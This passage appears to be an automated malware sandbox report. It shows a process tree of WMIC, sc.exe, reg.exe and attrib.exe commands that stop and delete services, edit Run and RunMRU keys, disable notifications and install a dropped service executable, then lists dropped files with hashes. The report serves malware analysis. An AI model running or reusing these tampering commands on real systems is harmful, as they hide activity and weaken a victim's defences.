                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:2024
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\SC.exe DELETE "loadhostDhcp"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe service where "name like 'App System'" call stopservice
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                    PID:552
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe service where "name like 'System'" call stopservice
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                      PID:2360
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'App System'" Call Delete
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                        PID:4648
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe service where "name like 'ServiceNetwork'" call stopservice
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        PID:3080
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe service where "name like 'Service Network'" call stopservice
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'ServiceNetwork'" Call Delete
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:2876
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Service Network'" Call Delete
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost'" call stopservice
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:5892
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Service'" call stopservice
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                PID:6120
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost'" Call Delete
                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                  PID:4400
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Service'" Call Delete
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                    PID:1236
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhostDhcp'" call stopservice
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:2416
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Dhcp'" call stopservice
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                        PID:1752
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhostDhcp'" Call Delete
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                        PID:4952
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Dhcp'" Call Delete
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                          PID:4028
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'System'" Call Delete
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:2036
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\sv.ini"
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:4560
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\Unicod.cmd"
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:3824
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                              PID:60
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:724
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:1428
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f /reg:64
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:1592
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:1764
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                          PID:3828
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                            PID:3976
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                              PID:4372
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              PID:2732
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                PID:2352
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                PID:208
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4724
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /t REG_SZ /d cmd\1 /f
                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2860
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /t REG_SZ /d a /f
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4532
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                      PID:1072
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:2260
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                                                                                                                                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:1588
                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\IntelSvc.exe" w -install_service -install_service
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                          PID:1156
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:2964

                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\config

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            0745485bad99ab69b3cf9224a83a6c08

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            0886f5c73bea048352c403528eb3918c93ff2b38

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b0bafe39a0008834df1ef4c5871aa5a35eb0730a2cb1efbdbe6702b6ada0dfed

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5f28e29dc9b0d09e0d4e1383c17baa0cf0e641e751abc5bd1b630d0f56a0786ceb0bc5c72341516b0811fcd94824b2d384da2e862c4b2eafba8d8507d0ddaa95

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\config

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            aeb55263daec8f8bb1f8f80cee00a145

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            0e4ef2d8f2ac673036b8c7608c7defd8c11043d3

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            cb7aa58af8ab6aef61e510a723dfe9a70040129bd71b9c5427ccc113b61f4efd

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            a13cd66501c179c6db5e9a5be115c12414cc88cefbdf594725ecdaa193359d7b9ab36a5eb478856e4bd1dad19c2e6e115282b20f671c7d1760214236c4089c81

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            149B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            defc652e8fba8b74886efbe9d535de77

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            01631468ed01eaa40414a428c9a2d2c128d57984

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b796480d174de308bb74f4d8ab392c16a8347dbe097271a894a9767b6c9e4310

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            106bbab05430ac865c733b360354ed16e9563b5db93133b023e8b053603fb710b57af59d4ec3fcc85e5e5e1f7dacc7c8dead0da4c4cb08c3465f32c8afa1982f

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            233B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            80007a8afa0c25c56b25807b085334be

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            0edd73d29d01015615d38e7aa8cc9739c177ab82

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            e48f07df1308c77adf323914ac9948ae2eb30055b8d102a9668ec83be9ed07f7

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            9d2690971852532f2edcdfdb7d7cc676f5054dd95c9aed58b4bd89a5a77b14316e0d151b63344b51d5521c7ae87020d2df1ea10538adb8adc12f207fabcd2708

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            546B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            ab74f56fe10995c5492e3c5e53decb5c

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            3ba30f54a57db69ec9a378b716268cf1decd43dc

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            fc2673d1d381cfcb87406cb346502af49c9bb42db38cc7e146ba9fec68cfdb34

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            7a1eb67f1810529872dd5d4a80c8e175882a7998671e6fed715bc740f5567ce08579b4801c8928cc44860ba904ab577cc0dfb02642faa36de395513cc4b79fad

                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            599B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            ba911467697548d72c32153b46cae514

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            13967721009afce31707825bdc4240bbdd29e1dc

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            5b31e754cab953199f1500a198045dbc9d598a6155cfcefd45bf20c1e1be101b

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            e98584c791e517a265a4b374c922bbec05c4e2bd5ccab81b348ed25d3966881c40dfe65e4df33f7ea1f1f8c1d219e9bda8458dff8bd9d544d0b531af19af175b

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            def65711d78669d7f8e69313be4acf2e

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            17KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            d7921060d90b6862c70c74b1db5edde4

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            c31de17cf83fc3ea64c2715d4ba9a7a45b4ba187

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            2fc8518234dc7f1eb09b104a83a0518a6387b54eb75c861e42b08a8e70d9cb66

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            30ebfadd71df395ad5c0d65c4e4d426e26c1243682a688b148e2bc3a9386cb9e61bd34eca6c4d45de73c204b32f77f742e0031d89eec91955657248ade759232

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            15KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            fb7aee38792a679dd1986196cedd0159

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            e3d70265a046668435970ec995214a3e2ba09651

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            fccfcea1898f9cb211c3e6615883ac37616a4d98f205a0650ca18887134f45ec

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            273314a0a6d6397796493b51a232a05cb52850a0a0954310f982a26343c259c71e750a4679f41def1ecf8c12e697c801b1f90fc97ae371c13c49f082838bb47a

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            15KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            7886f0a66623e817c02ef86387cb568f

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            c53993ec73feb129df43a251aaa1fdc7c2ab4c19

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            c5c8dafb12f17dce4687e3d9c9034eaef96f347b9a11fd089c58fbcaca7fb573

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            572207f04ef37efca1d6cb2f76baee6ba31cafb181e5ecbccbc518885baad2885fdb40ea09b2754b783bc8d7943b8a6b72e42851f2965482b98d1482df0fe5fd

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            18KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            ae7a2c9d72c9e75070284ff4a4eb424a

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            dce885a10b07bb6738553098b479477ac51f0459

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f0b2c06e03a5e0efe9d0b0387ce47ba948ef029fd25037b923ed6a4937ca6fc4

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            9fbba6a91777a85bff1e9c6bd754e1dc033d5eb8dbf7f8bc334130b38a049f1b80eb0524a2392698cd5a09c119dc16c34260054dd1715f3180dc592411ac8bd2

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a4297cc8ce27a00fc1987b3c78690a5d

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            a8915782c664904d9d53cd0f3b568f5aa7d26012

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b4a903ef679d68400689576bbf53cff0f6844abf103724683bbd2f96b01d0ad2

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            be158de112d9743af40a3e70d2c54bf992ca222d603cd3306d6dfdfc209a5fbdd6e7876da3d56f852cf0e5e608dc876910a1f5e1dc6ef8fa80aca7c67c06c27f

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            18KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            51da497fb6de00d76af834f942f7ee48

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            53757a2a0c5832d3f37c85c9393b673c8151ef25

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            833f5fccb824ab10e43fe1df30e012a3c4d1da5206a5290167ea7c551e94aca5

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            0bc1e97256f8058e1246dd856997da36feb6f7639e3b26763d66b67b44fc7543b06e524364a1814c1e3d08a17502005056acd68a7607860864a1b2f47e133831

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            2dec8ba420c2ac47d0d87b77a4088b7a

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            19c1744a8a662aad87e78cfbe0cf275e6644632b

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            718f01c8fe6e1949c2e97b09120d37e513357cda98174d14a96084e2f09a2670

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            fff2b0edb6d21e17b6bb73c626d67e6f077647a9049efa41951bb7cb4d7c09d33d56d712e56f703b7cedf7c25680b79c08487c10a222d58264a268517c73d0f5

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a790d39b2da2945bc786a961081a429b

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            9fb5c1f50fed5d92d964c0d3de90f20f69104f70

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            91d4584b5cafdce4b5e1d1e82498319d2d65789460d074d0fbae6ec7acc4dc4f

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            e373d3dbbf9d6135d5ed313b5a7bca28e412c73d5b3f876e2655afdc8c33393d90bccdc06f9ddda26d4965d8cf12e8c8dde9f8cda97179de6693afb2f4127245

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            5df3bee479e9cd1a98b54511ec673a0b

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            2029b2562885ef5be74b53af22c6f0d19cdf8d0b

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            736dac53c76f2e3691c6d1d8f4650d0e791ba4539fb085ca5b09cac99e52e506

                                                                                                                                                                                                                                                                                                                                            SHA512

